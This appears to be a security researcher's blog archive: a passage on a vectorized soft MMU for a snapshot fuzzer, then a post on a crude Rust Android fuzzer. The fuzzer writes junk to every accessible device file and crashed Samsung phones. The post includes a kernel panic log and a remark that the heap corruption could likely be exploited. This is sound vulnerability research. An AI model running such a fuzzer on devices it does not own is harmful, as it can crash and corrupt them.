When a VM launches it has zero memory in its MMU. This means creating a VM costs almost nothing (a few milliseconds). It creates an empty page table and that’s it.

So where does memory come from?

Since a VM starts off with no memory at all, it can’t possibly have the contents of the snapshot we are executing from. This is because only the metadata of the snapshot was processed. When the VM attempts to touch the first memory it uses (likely the memory containing the first instruction), it will raise an exception.

We’ve designed the MMU such that there is an ability to install an exception handler. This means that on an exception we can check if the input snapshot contained the memory we faulted on. If it did then we can read the memory from the snapshot and map it in. Then the VM can be resumed.

This has the awesome effect that only memory which is ever touched is brought in from disk. If you have a 100 terabyte memory snapshot but the fuzz case only touches 1 MiB of memory, you only ever actually read 1 MiB from disk (plus the metadata of the snapshot, e.g. PE/ELF headers). This memory is pulled in based on the page granularity in use. Since this is configurable you can tweak it to your heart’s desire.
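In very rough pseudocode (the handler API and types here are stand-ins, not the MMU’s real interface), the snapshot fault-in handler boils down to something like:

use std::collections::HashMap;

/// Stand-in types for this sketch
struct Snapshot {
    /// Page-granular contents of the snapshot, keyed by guest address
    pages: HashMap<u64, Vec<u8>>,
}

struct Mmu {
    /// Pages that have actually been mapped in so far
    mapped: HashMap<u64, Vec<u8>>,
}

/// Exception handler: only pages that are ever touched get read from the
/// snapshot and mapped in. Returns whether the fault was handled and the VM
/// can be resumed.
fn handle_fault(mmu: &mut Mmu, snapshot: &Snapshot, page_addr: u64) -> bool {
    if let Some(contents) = snapshot.pages.get(&page_addr) {
        // The snapshot had this page; map it in and resume the VM
        mmu.mapped.insert(page_addr, contents.clone());
        true
    } else {
        // Genuinely unmapped memory, report the fault
        false
    }
}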

Sharing memory / forking

Memory which is only ever read has no reason to be copied for every VM. Thus we need a mechanism for sharing read-only memory between VMs. Further memory is shared between all cores running in the same “IL session”, or group of VMs fuzzing the same code and target.

We accomplish this by using a forking model. A ‘master’ MMU is created and an exception handler is installed to handle faults (to lazily pull in memory contents). The master MMU is the template for all future VMs and is the state of memory upon a reset.

When a core comes up, a fork from this ‘master’ MMU is created. Once again this is lazy. The child has no memory mapped in and will fault in pages from the master when needed.

When a page is accessed for reading only by a child VM the page in the child is directly mapped to the master’s copy. However since this memory could theoretically have write-permissions at the byte level, we protect this memory by setting an aliased bit on the last level page table, next to the dirty bit. This gives us a mechanism to prevent a master’s memory from ever getting updated even if it’s writable.

To allow for writes to the VM we add another bit to the last level page tables, a cow, or copy-on-write, bit. This is always accompanied with the aliased bit, and instead of delivering a fault on a write-to-aliased-memory access, we create a copy of the master’s page and allow writes to that.
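Putting the aliased and cow bits together, the write path’s decision looks roughly like this sketch (bit positions and names are assumptions, and the permission checks and dirty-list update are omitted):

const DIRTY_BIT:   u64 = 1 << 0;
const ALIASED_BIT: u64 = 1 << 1;
const COW_BIT:     u64 = 1 << 2;

/// Decide what to do when writing through a final-level entry. In the real
/// code this whole check is skipped if the page is already dirty, since
/// dirty memory can never be aliased.
fn on_write(entry: &mut u64, make_private_copy: impl Fn(u64) -> u64)
        -> Result<(), ()> {
    if *entry & ALIASED_BIT != 0 {
        if *entry & COW_BIT == 0 {
            // Aliased but not copy-on-write: writes are never allowed here
            return Err(());
        }
        // Copy-on-write: clone the shared page and point this entry at the
        // private copy, dropping the aliased/cow bits
        let page_ptr = *entry & !(ALIASED_BIT | COW_BIT | DIRTY_BIT);
        *entry = make_private_copy(page_ptr);
    }
    // Mark dirty (dirty list update omitted in this sketch)
    *entry |= DIRTY_BIT;
    Ok(())
}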

An example in aliased/CoWed memory access

This leads us to a pretty sophisticated potential model of fault patterns. Let’s walk through a common case example.

  • An empty master MMU is created
  • An exception handler is added to the master MMU that faults in pages from the disk on-demand
  • A child is forked from the master
  • A read occurs to a page in the child
  • This causes an exception in the child as it has no memory
  • The exception handler recognizes there’s a master for this child and goes to access the master’s memory for this page
  • The master has no memory for this page and causes an exception
  • The master’s exception handler handles loading the page from disk, creating an entry
  • The master returns out with exception handled
  • The child directly links in the master’s page as aliased
  • Child returns with no exception
  • Child then dispatches a write to the same memory
  • The page is marked as aliased and thus cannot be written to
  • A copy of the master’s page is made
  • The permissions are checked in the page for write-access for all bytes being written to
  • The write occurs in the child-owned page
  • Success

While this is quite slow for the initial access, the child maintains its CoWed memory upon reset. This means that while the first few fuzz cases may be slow as memory is faulted in and copied, this cost eventually completely disappears as memory reaches a steady-state.

The overall result of this model is that memory only is ever read from disk if ever used, it then is only ever copied if it needs to be mutated. Memory which is only ever read is shared between all cores and greatly reduces cache pollution.

In theory a copy of all pages should be made for every NUMA node on the system to decrease latency in the case of a cache miss. This increases memory usage but increases performance.

All of this is done at page granularity which is configurable. Now you can see how big of an impact 8-byte pages can have as memory which may be writable (like a stack) but never is written to for a specific 8-byte region can be shared without extra memory cost.

This allows running 2048 4 GiB VMs with typically less than 200 MiB of memory usage as most fuzz cases touch a tiny amount of memory. Of course this will vary by target.

Deduplicated memory

Ha! You thought we were all done and ready to talk about performance? Not quite yet, we’ve got another trick up our sleeves!

Since we’re already sharing memory and have support for aliased memory, we can take it one step further. When we add memory to the VM we can deduplicate it.

This might sound really complex, but the implementation is so simple that there’s almost no reason to not do it. Rather than directly creating memory in the master, we can instead maintain a HashSet of pages and create aliased mappings to the entries in this set. When memory is added to a VM it is added to the deduplicated HashSet, which will create a new entry if it does not exist, or do nothing if it already exists. The page tables then directly reference the memory in this HashSet with the aliased bit set. Since pages contain the permissions, this automatically handles creating different copies of the same memory with different permissions.
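The core of this is really just a set lookup. A minimal sketch (in the real code the page tables point into these entries with the aliased bit set, which is omitted here):

use std::collections::HashSet;

/// Deduplicated backing store: one copy per unique page. Permissions are part
/// of the page contents, so the same bytes with different permissions
/// naturally get their own entry.
struct DedupStore {
    pages: HashSet<Vec<u8>>,
}

impl DedupStore {
    /// Add a page, returning a reference to the single shared copy
    fn add_page(&mut self, page: Vec<u8>) -> &Vec<u8> {
        // Inserting an already-present page is a no-op
        self.pages.insert(page.clone());
        self.pages.get(&page).unwrap()
    }
}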

Ta-da! We now will only create one read-only copy of each unique page. Say you have 1 MiB of read-writable zeros (would be 16 MiB when interleaved and with permissions), and are using 8-byte pages, you end up only ever creating one 8-byte page (128-byte actual backing) for all of this memory! As with other aliased memory, it can be cow memory and cloned if modified.

The gain from this is minimal in practice, but the code complexity increase given we already handle cow and aliased memory is so little that there’s really no reason to not do it. Since the Xeon Phi has no L3 cache, anything I can do to reduce cache pollution helps.

For example with a child with memory contents “AAAA00:D!!” where the “:D” was written in at offset 6.

cow_and_dedup


Performance

Alright so we’ve talked about everything we implement in the MMU, but we haven’t talked at all about the JIT or performance.

There are two important aspects to performance:

  • The JIT
  • Injecting fuzz cases / allocating memory

The JIT performance being important should be obvious. Memory accesses are the most expensive things we can do in our emulator and are responsible for bringing our best case 2 trillion instructions/second benchmark to about 40-120 billion instructions/second in an actual codebase (old numbers, old MMU, 32-bit model). The faster we can make memory accesses, the closer we can get to this best-case performance number. This means we have a potential 50x speedup if we were to make memory accesses cost nothing.

Next we have the maybe-not-so-obvious performance-critical aspect. Getting fuzz cases into the VMs and handling dynamic allocations in the VMs. While this is pretty much never a problem in traditional fuzzers, on a small target I may be running between 2-5 million fuzz cases per second. Meaning I need to somehow perform 2-5 million changes to the MMU per second (typically 1024-or-so byte inputs).

Further the VM may dynamically allocate memory via malloc() which we hook to get byte-level allocation support and to track uninitialized memory. A VM might do this a few times a fuzz case, so this could result in potentially tens of millions of MMU modifications per second.

The JIT / IL

We’re not going to go into insane details as I’ve open sourced the actual JIT used in the MMU described by this blog. However we can hit on some of the high-level JIT and IL concepts.

When we’re running under the JIT there may be arbitrary VMs running (the VM-0-must-always-be-running restriction described in the intro has been lifted), as well as potential differing addresses that they are accessing.

Differing addresses

Since a vectorized page table walk is more expensive than a single page walk, we first always check whether or not the VMs that are active are accessing the same memory. If they’re accessing the same memory then we can extract the address from one of the VMs and perform a single scalar page walk. If they differ then we perform the more expensive vectorized walk (which is still a huge improvement from the 32-bit model of a different scalar walk for every differing address).

Since the only metadata we store in the page tables are the aliased, CoW, and dirty bits, the scalar page walk is safe to do for all VMs. If permissions differ between the VMs that’s fine as those bytes are stored in the page itself.

The part of the page walk that gets complex during a vectorized walk is updating the dirty bits. In a scalar walk it’s simple. If the dirty bit is not set and we’re performing a write, then we add to the dirty list and set the dirty bit. Otherwise we skip updating the dirty bit and dirty list. This prevents duplicate entries in the dirty list. Further we store the guest address and the translated address in the dirty list so we do not have to re-translate during a reset. If an exception occurs at any point during the walk, all VMs that are enabled are reported to have caused the exception.

We also perform the aliased memory check if and only if the dirty bit was not set. This aliased memory check is how we prevent writing to an aliased page. Since this check has a non-zero cost, and since dirty memory can never be aliased, we simply skip the check if the memory is already dirty, as it’s guaranteed to not be aliased if it’s dirty.

Vectorized translation

However in a vectorized walk it gets really tricky. First it’s possible that the different addresses fail translation at differing levels (during page table walks and during permission checks). Further they can have differing dirtiness which might require multiple entries to be added to the dirty list.

To handle translations failing at different points, we mask off VMs as they fail at various points. At the end of the translation we determine if any VM failed, and if it did we can report the failure correctly for all VM’s that failed at any point during the translation. This allows us to get a correct caused_vmexit mask from a single translation, rather than getting a partial report and getting more exceptions at a different translation stage on the next re-entry.

Vectorized dirty list updating

Further we have to handle dirty bits. I do this in a weird way right now and it might change over time. I’m trying to keep all possible JIT at parity with the interpreted implementation. The interpreted version is naive and simply performs the translations on all VMs in left-to-right order (see the JIT tests for this operation). This also maintains that no duplicates ever exist in the dirty lists.

To prevent duplicates in the dirty list we rely on the dirty bit in the page table, however when handling differing addresses we could potentially update the same address twice and create two dirty entries. The solution I made for this is to perform vectorized checks for the dirty bits, and if they’re already set we skip the expensive setting of the dirty bits. This is the fast path.

However in the slow path we store the addresses to the stack and individually update dirty bits and dirty entries for each lane. This prevents us from adding duplicates to the dirty list and keeps the JIT implementation at parity with the interpreter (thus allowing 1-to-1 checks for JIT correctness against the interpreter). Since we skip this slow path if the memory is already dirty, this probably won’t matter for performance. If it turns out to matter later on I might drop the no-duplicates-in-the-dirty-list restriction and vectorize updates to this list.

IL MMU routines

I’m going to have a whole blog on my IL, but it’s a simple SSA IL.

Memory accesses themselves are pretty fast in my vectorized model, however the translations are slow. To mitigate this I split up translations and read/write operations in my IL. Since page walks, dirty updates, and permission checks are done in my translate IL instruction, I’m able to reuse translations from previous locations in the IL graph which use the same IL expression as the address.

For example, a 4-byte translate for writing of rsp+0x50 occurs at the root block of a function. Now at future locations in the graph which read or write at the same location for 4-or-fewer bytes can reuse the translation. Since it’s an SSA the rsp+0x50 value is tied to a certain version of rsp, thus changes to rsp do not cause the wrong translation to be used. This effectively deletes the page walks for stack locals and other memory which is not dynamically indexed in the function. It’s kind of like having a TLB in the IL itself.

Since the initial translate was responsible for the permission checks and updates of things like the RaW bits and dirty bits, we never have to run these checks again in this case. This turns memory operations into simple loads and stores.

Since stores are supersets of loads and larger sizes are supersets of smaller sizes, I can use translations from slightly different sizes and accesses.

Since it’s possible a VM exit occurs and memory/permissions are changed, I must invalidate these translations on VM exits. More specifically I can invalidate them only on VM entries where a page table modification was made since the last VM exit. This makes the invalidate case rare enough to not matter.

The performance numbers

These are the performance numbers (in cycles) for each type and size of operation. The translate times are the cost of walking the page tables and validating permissions, the access times are the cost of reading/writing to already translated memory. The benchmarks were done on a Xeon Phi 7210 on a single hardware thread. All times are in cycles and cover the translation and accesses for all 8 lanes.

These are best-case translate/access times as it’s the same memory translated in a loop over and over causing the tables and memory in question to be present in L1 cache.

The divergent cases are ones where different addresses were supplied to each lane and force vectorized page walks.

Write: false | opsize: 1 | Diverge: false | Translate    37.8132 cycles | Access    10.5450 cycles
Write: false | opsize: 2 | Diverge: false | Translate    39.0831 cycles | Access    11.3500 cycles
Write: false | opsize: 4 | Diverge: false | Translate    39.7298 cycles | Access    10.6403 cycles
Write: false | opsize: 8 | Diverge: false | Translate    35.2704 cycles | Access     9.6881 cycles
Write: true  | opsize: 1 | Diverge: false | Translate    44.9504 cycles | Access    16.6908 cycles
Write: true  | opsize: 2 | Diverge: false | Translate    45.9377 cycles | Access    15.0110 cycles
Write: true  | opsize: 4 | Diverge: false | Translate    44.8083 cycles | Access    16.0191 cycles
Write: true  | opsize: 8 | Diverge: false | Translate    39.7565 cycles | Access     8.6500 cycles
Write: false | opsize: 1 | Diverge: true  | Translate   140.2084 cycles | Access    16.6964 cycles
Write: false | opsize: 2 | Diverge: true  | Translate   141.0708 cycles | Access    16.7114 cycles
Write: false | opsize: 4 | Diverge: true  | Translate   140.0859 cycles | Access    16.6728 cycles
Write: false | opsize: 8 | Diverge: true  | Translate   137.5321 cycles | Access    14.1959 cycles
Write: true  | opsize: 1 | Diverge: true  | Translate   158.5673 cycles | Access    22.9880 cycles
Write: true  | opsize: 2 | Diverge: true  | Translate   159.3837 cycles | Access    21.2704 cycles
Write: true  | opsize: 4 | Diverge: true  | Translate   156.8409 cycles | Access    22.9207 cycles
Write: true  | opsize: 8 | Diverge: true  | Translate   156.7783 cycles | Access    16.6400 cycles

Performance analysis

These numbers actually look really good. Just about 10 or so cycles for most accesses. The translations are much more expensive but with TLBs and caching the translations in the IL tree we should hopefully do these things rarely. The divergent translation times are about 3.5x more expensive than the scalar counterparts which is pretty impressive. 8 separate page walks at only 3.5x more cost than a single walk! That’s a big win for this new MMU!

TLBs (not implemented as of this writing)

Similar to the cached translations in the IL tree, I can have a TLB which caches a limited amount of arbitrary translations, just like an actual CPU or many other JITs. I currently plan on having TLB entries for each type of operation such that no permission checks are needed on read/write routines. However I could use a more typical TLB model where translations are cached (rather than permission checks and RaW updates), and then I would have to perform permission checks and RaW updates on all memory accesses (but not the translation phase).

I plan to just implement both models and benchmark them. The complexity of theorizing this performance difference is higher than just doing it and getting real measurements…
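For reference, the simpler of the two could be as small as this direct-mapped sketch (sizes and field names invented for illustration; as noted, nothing like this is implemented yet):

/// Tiny direct-mapped TLB sketch: caches guest page -> translated backing
/// pointer. Entry count and page size are arbitrary choices here.
const TLB_ENTRIES: usize = 64;
const PAGE_SHIFT:  u64   = 3; // 8-byte pages in this example

#[derive(Clone, Copy, Default)]
struct TlbEntry {
    guest_page: u64,
    host_ptr:   u64,
    valid:      bool,
}

struct Tlb {
    entries: [TlbEntry; TLB_ENTRIES],
}

impl Tlb {
    fn lookup(&self, guest: u64) -> Option<u64> {
        let page = guest >> PAGE_SHIFT;
        let ent  = self.entries[(page as usize) % TLB_ENTRIES];
        if ent.valid && ent.guest_page == page {
            Some(ent.host_ptr)
        } else {
            None
        }
    }

    fn insert(&mut self, guest: u64, host_ptr: u64) {
        let page = guest >> PAGE_SHIFT;
        self.entries[(page as usize) % TLB_ENTRIES] =
            TlbEntry { guest_page: page, host_ptr, valid: true };
    }

    /// Called on VM entry if page tables were modified since the last exit
    fn invalidate_all(&mut self) {
        self.entries = [TlbEntry::default(); TLB_ENTRIES];
    }
}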

Fast injection/permission modifications

To support fast fuzz case injection and permission changes I have a few handwritten AVX-512 routines which are optimized for speed. These can then be tested against the naive reference implementation for correctness as there’s a much higher chance for mistakes.

I expose 3 different routines for this. A vectorized broadcast (writing the same memory to multiple VMs), a vectorized memset (applying the same byte to either memory contents or permissions), and a vectorized write-multiple.

Vectorized broadcast

This one is pretty simple. You supply an address in the VM, a payload, and a mask (deciding which VMs to actually write to). This will then write the same payload to all VMs which are enabled by the mask. This surprisingly doesn’t have a huge use case that I can think of yet.

Vectorized memset

Since permissions and memory are stored right next to each other this memset is written in a way that it can be used to update either permissions or contents. This takes in an address, a byte to broadcast, a bool indicating if it should write to permissions or contents, and a mask of VMs to broadcast to.

This routine is how permissions are updated in bulk. I can quickly update permissions on arbitrary sets of VMs in a vectorized manner. Further it can be used on contents to do things like handle zeroing of memory on a hooked call like malloc().

Vectorized write-multiple

This is how we get fuzz cases in. I take one address, a VM mask, and multiple inputs. I then inject those inputs to their corresponding VMs all at the same address. This allows me to write all my differing fuzz cases to the same location in memory very quickly. Since most fuzzing is writing an input to all VMs at the same location this should suffice for most cases. If I find I’m frequently writing multiple inputs to multiple different locations I’ll probably make another specialized routine.

Due to the complexities of handling partial reads from the input buffers in a vectorized way, this routine is restricted to writing 8-byte size aligned payloads to 8-byte aligned addresses. To get around this I just pad out my fuzz inputs to 8-byte boundaries.
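Padding the inputs is trivial; a hypothetical helper like this is all it takes:

/// Pad a fuzz input out to an 8-byte boundary so it can be handed to the
/// vectorized write-multiple routine (a made-up helper for illustration)
fn pad_to_qword(input: &mut Vec<u8>) {
    while input.len() % 8 != 0 {
        input.push(0);
    }
}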

Are these fast routines really needed?

For example the benchmarks for the Rust implementation for a page table of shape: [16, 16, 16, 13, 3]

Note that the benchmarks are a single hardware thread running on a Xeon Phi 7210

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1873 seconds
1024 byte chunks read per second                30115.5741
1024 byte chunks written per second             29243.0394
1024 byte chunks memset per second              29340.3969
1024 byte chunks permed per second              34971.7952
1024 byte chunks write multiple per second       6864.1243

And the AVX-512 handwritten implementation on the same machine and same shape:

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1878 seconds
1024 byte chunks read per second                30073.5090
1024 byte chunks written per second            770678.8377
1024 byte chunks memset per second             777488.8143
1024 byte chunks permed per second             780162.1310
1024 byte chunks write multiple per second     751352.4038

Effectively a 25x speedup for the same result!

With a larger page size ([16, 16, 16, 6, 10]) this number goes down as I can use the old translation longer and I spend less time translating pages:

Rust implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0829 seconds
1024 byte chunks read per second                30201.6634
1024 byte chunks written per second             31850.8188
1024 byte chunks memset per second              31818.1619
1024 byte chunks permed per second              34690.8332
1024 byte chunks write multiple per second       7345.5057

Hand-optimized implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0826 seconds
1024 byte chunks read per second                30168.3047
1024 byte chunks written per second          32993840.4624
1024 byte chunks memset per second           33131493.5139
1024 byte chunks permed per second           36606185.6217
1024 byte chunks write multiple per second   10775641.4470

In this case it’s over 1000x faster for some of the implementations! At this rate we can trivially get inputs in much faster than the underlying code possibly could run!


Future improvements/ideas

Currently a full 64-bit address space is emulated. Since nothing we emulate uses a full 64-bit address space this is overkill and increases the page table memory size and page table walk costs. In the future I plan to add support for partial address space support. For example if you only define the page table to handle 16-bit addresses, it will, optionally based on another constant, make sure addresses are sign-extended or zero-extended from these 16-bit addresses. By supporting both sign-extended and zero-extended addresses we should be able to model all architecture’s specific behaviors. This means if running a 32-bit application in our 64-bit JIT we could use a 32-bit address space and decrease the cost of the MMU.
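A sketch of what that check might look like (purely speculative since this isn’t implemented; the constant and function are invented here):

/// Number of meaningful guest address bits in this hypothetical configuration
const GUEST_BITS: u32 = 16;

/// Check that an address is a proper sign- or zero-extension of its low
/// GUEST_BITS bits before translating it
fn is_canonical(addr: u64, sign_extend: bool) -> bool {
    if sign_extend {
        // Sign-extending the low GUEST_BITS bits must reproduce the address
        (((addr as i64) << (64 - GUEST_BITS)) >> (64 - GUEST_BITS)) as u64 == addr
    } else {
        // Zero-extension: all high bits must already be clear
        addr >> GUEST_BITS == 0
    }
}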

I could add more fast-injection routines as needed.

I may move permission checks to loads/stores rather than translation IL operations, to allow reuse of TLB entries for the same page but differing offsets/operations.

Writing the worlds worst Android fuzzer, and then improving it

18 October 2018 at 09:57

So slimy it belongs in the slime tree

Why

Changelog

Date Info
2018-10-18 Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Disclaimer

I recognize the bugs discussed here are not widespread Android bugs individually. None of these are terribly critical and typically only affect one specific device. This blog is meant to be fun and silly and not meant to be a serious review of Android’s security.

Give me the code

Slime Tree Repo

Intro

Today we’re going to write arguably one of the worst Android fuzzers possible. Experience unexpected success, and then make improvements to make it probably the second worst Android fuzzer.

When doing Android device fuzzing the first thing we need to do is get a list of devices on the phone and figure out which ones we can access. This is simple right? All we have to do is go into /dev and run ls -l, and anything with read or write permissions for all users we might have a whack at. Well… with selinux this is just not the case. There might be one person in the world who understands selinux but I’m pretty sure you need a Bombe to decode the selinux policies.

To solve this problem let’s do it the easy way and write a program that just runs in the context we want bugs from. This program will simply recursively list all files on the phone and actually attempt to open them for reading and writing. This will give us the true list of files/devices on the phone we are able to open. In this blog’s case we’re just going to use adb shell and thus we’re running as u:r:shell:s0.

Recursive listdiring

Alright so I want a quick list of all files on the phone and whether I can read or write to them. This is pretty easy, let’s do it in Rust.

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

Woo, that was pretty simple, to get a full directory listing of the whole phone we can just:

// List all files on the system
let mut dirlisting = Vec::new();
listdirs(Path::new("/"), &mut dirlisting);

Fuzzing

So now we have a list of all files. We now can use this for manual analysis and look through the listing and start doing source auditing of the phone. This is pretty much the correct way to find any good bugs, but maybe we can automate this process?

What if we just randomly try to read and write to the files. We don’t really have any idea what they expect, so let’s just write random garbage to them of reasonable sizes.

// List all files on the system
let mut listing = Vec::new();
listdirs(Path::new("/"), &mut listing);

// Fuzz buffer
let mut buf = [0x41u8; 8192];

// Fuzz forever
loop {
    // Pick a random file
    let rand_file = rand::random::<usize>() % listing.len();
    let (path, can_read, can_write) = &listing[rand_file];

    print!("{:?}\n", path);

    if *can_read {
        // Fuzz by reading
        let fd = OpenOptions::new().read(true).open(path);

        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.read(&mut buf[..fuzz_size]);
        }
    }

    if *can_write {
        // Fuzz by writing
        let fd = OpenOptions::new().write(true).open(path);
        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.write(&buf[..fuzz_size]);
        }
    }
}

When running this it pretty much stops right away, getting hung on things like /sys/kernel/debug/tracing/per_cpu/cpu1/trace_pipe. There are typically many sysfs and procfs files on the phone that will hang forever when trying to read from them. Since this prevents our “fuzzer” from running any longer we need to somehow get around blocking reads.

How about we just make, let’s say… 128 threads and just be okay with threads hanging? At least some of the others will keep going for at least a while? Here’s the complete program:

extern crate rand;

use std::sync::Arc;
use std::fs::OpenOptions;
use std::io::{Read, Write};
use std::path::{Path, PathBuf};

/// Maximum number of threads to fuzz with
const MAX_THREADS: u32 = 128;

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

/// Fuzz thread worker
fn worker(listing: Arc<Vec<(PathBuf, bool, bool)>>) {
    // Fuzz buffer
    let mut buf = [0x41u8; 8192];

    // Fuzz forever
    loop {
        let rand_file = rand::random::<usize>() % listing.len();
        let (path, can_read, can_write) = &listing[rand_file];

        //print!("{:?}\n", path);

        if *can_read {
            // Fuzz by reading
            let fd = OpenOptions::new().read(true).open(path);

            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.read(&mut buf[..fuzz_size]);
            }
        }

        if *can_write {
            // Fuzz by writing
            let fd = OpenOptions::new().write(true).open(path);
            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.write(&buf[..fuzz_size]);
            }
        }
    }
}

fn main() {
    // Optionally daemonize so we can swap from an ADB USB cable to a UART
    // cable and let this continue to run
    //daemonize();

    // List all files on the system
    let mut dirlisting = Vec::new();
    listdirs(Path::new("/"), &mut dirlisting);

    print!("Created listing of {} files\n", dirlisting.len());

    // We wouldn't do anything without any files
    assert!(dirlisting.len() > 0, "Directory listing was empty");

    // Wrap it in an `Arc`
    let dirlisting = Arc::new(dirlisting);

    // Spawn fuzz threads
    let mut threads = Vec::new();
    for _ in 0..MAX_THREADS {
        // Create a unique arc reference for this thread and spawn the thread
        let dirlisting = dirlisting.clone();
        threads.push(std::thread::spawn(move || worker(dirlisting)));
    }

    // Wait for all threads to complete
    for thread in threads {
        let _ = thread.join();
    }
}

extern {
    fn daemon(nochdir: i32, noclose: i32) -> i32;
}

pub fn daemonize() {
    print!("Daemonizing\n");

    unsafe {
        daemon(0, 0);
    }

    // Sleep to allow a physical cable swap
    std::thread::sleep(std::time::Duration::from_secs(10));
}

Pretty simple, nothing crazy here. We get a full phone directory listing, spin up MAX_THREADS threads, and those threads loop forever picking random files to read and write to.

Let me just give this a little push to the phone annnnnnnnnnnnnnd… and the phone panicked. In fact almost all the phones I have at my desk panicked!

There we go. We have created a world class Android kernel fuzzer, printing out new 0-day!

In this case we ran this on a Samsung Galaxy S8 (G950FXXU4CRI5). Let’s check out how we crashed by reading /proc/last_kmsg from the phone:

Unable to handle kernel paging request at virtual address 00662625
sec_debug_set_extra_info_fault = KERN / 0x662625
pgd = ffffffc0305b1000
[00662625] *pgd=00000000b05b7003, *pud=00000000b05b7003, *pmd=0000000000000000
Internal error: Oops: 96000006 [#1] PREEMPT SMP
exynos-snapshot: exynos_ss_get_reason 0x0 (CPU:1)
exynos-snapshot: core register saved(CPU:1)
CPUMERRSR: 0000000002180488, L2MERRSR: 0000000012240160
exynos-snapshot: context saved(CPU:1)
exynos-snapshot: item - log_kevents is disabled
TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 0
CPU: 1 MPIDR: 80000101 PID: 3944 Comm: Binder:3781_3 Tainted: G        W       4.4.111-14315050-QB19732135 #1
Hardware name: Samsung DREAMLTE EUR rev06 board based on EXYNOS8895 (DT)
task: ffffffc863c00000 task.stack: ffffffc863938000
PC is at kmem_cache_alloc_trace+0xac/0x210
LR is at binder_alloc_new_buf_locked+0x30c/0x4a0
pc : [<ffffff800826f254>] lr : [<ffffff80089e2e50>] pstate: 60000145
sp : ffffffc86393b960
[<ffffff800826f254>] kmem_cache_alloc_trace+0xac/0x210
[<ffffff80089e2e50>] binder_alloc_new_buf_locked+0x30c/0x4a0
[<ffffff80089e3020>] binder_alloc_new_buf+0x3c/0x5c
[<ffffff80089deb18>] binder_transaction+0x7f8/0x1d30
[<ffffff80089e0938>] binder_thread_write+0x8e8/0x10d4
[<ffffff80089e11e0>] binder_ioctl_write_read+0xbc/0x2ec
[<ffffff80089e15dc>] binder_ioctl+0x1cc/0x618
[<ffffff800828b844>] do_vfs_ioctl+0x58c/0x668
[<ffffff800828b980>] SyS_ioctl+0x60/0x8c
[<ffffff800815108c>] __sys_trace_return+0x0/0x4

Ah cool, derefing 00662625, my favorite kernel address! Looks like it’s some form of heap corruption. We probably could exploit this, especially since if we mapped in 0x00662625 we would get to control a kernel-land object from userland. It would require the right groom. This specific bug has been minimized and you can find a targeted PoC in the Wall of Shame section.

Using the “fuzzer”

You’d think this fuzzer is pretty trivial to run, but there are some things that can really help it along. Especially on phones which seem to fight back a bit.

Protips:

  • Restart fuzzer regularly, it gets stuck a lot
  • Do random things on the phone like browsing or using the camera to generate kernel activity
  • Kill the app and unplug the ADB USB cable frequently, this can cause some of the bugs to trigger when the application suddenly dies
  • Tweak the MAX_THREADS value from low values to high values
  • Create blacklists for files which are known to block forever on reads

Using the above protips I’ve been able to get this fuzzer to work on almost every phone I have encountered in the past 4 years, with dwindling success as selinux policies get stricter.

Next device

Okay so we’ve looked at the latest Galaxy S8, let’s try to look at an older Galaxy S5 (G900FXXU1CRH1). Whelp, that one crashed even faster. However if we try to get /proc/last_kmsg we will discover that this file does not exist. We can also try using a fancy UART cable over USB with the magic 619k resistor and daemonize() the application so we can observe the crash over that. However that didn’t work in this case either (honestly not sure why, I get dmesg output but no panic log).

So now we have this problem. How do we root cause this bug? Well, we can do a binary search of the filesystem and blacklist files in certain folders and try to whittle it down. Let’s give that a shot!

First let’s only allow use of /sys/* and beyond, all other files will be disallowed, typically these bugs from the fuzzer come from sysfs and procfs. We’ll do this by changing the directory listing call to listdirs(Path::new("/sys"), &mut dirlisting);

Woo, it worked! Crashed faster, and this time we limited to /sys. So we know the bug exists somewhere in /sys.

Now we’ll go deeper in /sys, maybe we try /sys/devices… oops, no luck. We’ll have to try another. Maybe /sys/kernel?… WINNER WINNER!

So we’ve whittled it down further to /sys/kernel/debug but now there are 85 folders in this directory. I really don’t want to manually try all of them. Maybe we can improve our fuzzer?

Improving the fuzzer

